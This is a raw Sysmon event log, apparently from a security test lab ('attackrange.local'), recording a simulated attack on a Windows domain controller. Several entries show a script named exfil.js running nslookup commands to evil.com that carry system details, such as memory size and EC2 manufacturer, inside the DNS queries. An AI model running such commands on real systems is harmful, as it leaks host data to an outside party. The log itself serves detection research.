14:21:33.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209637Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209636Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.781{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209635Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.781{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-F043-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209634Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.780{2E1864BB-18E0-629A-6742-000000005F02}39765400C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-F043-000000005F02}6224C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209633Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.780{2E1864BB-18ED-629A-F043-000000005F02}6224C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldbyghk.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209632Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.777{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpqma.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209631Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209630Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-18ED-629A-EE43-000000005F02}11367736C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-EF43-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209629Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209628Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209627Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209626Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-EF43-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209625Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-18ED-629A-ED43-000000005F02}59322536C:\Windows\system32\cmd.exe{2E1864BB-18ED-629A-EF43-000000005F02}6520C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209624Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.728{2E1864BB-18ED-629A-EF43-000000005F02}6520C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18ED-629A-ED43-000000005F02}5932C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpqma.tmp 2>&1 10341000x8000000000000000209623Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.697{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-EE43-000000005F02}1136C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209622Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.697{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18ED-629A-EE43-000000005F02}1136C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209621Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.697{2E1864BB-18ED-629A-EE43-000000005F02}11367736C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-ED43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209620Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.697{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-EE43-000000005F02}1136C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209619Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209618Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209617Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209616Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209615Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-FA28-6299-3207-000000005F02}50324716C:\Windows\system32\csrss.exe{2E1864BB-18ED-629A-ED43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000209614Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-18E0-629A-6742-000000005F02}39762668C:\Windows\System32\WScript.exe{2E1864BB-18ED-629A-ED43-000000005F02}5932C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000209613Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.692{2E1864BB-18ED-629A-ED43-000000005F02}5932C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A Manufacturer: Amazon EC2 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlhpqma.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000209612Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.681{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlebavnl.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000209611Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-18ED-629A-EB43-000000005F02}64244708C:\Windows\system32\conhost.exe{2E1864BB-18ED-629A-EC43-000000005F02}4200C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209610Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209609Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000209608Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:33.659{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 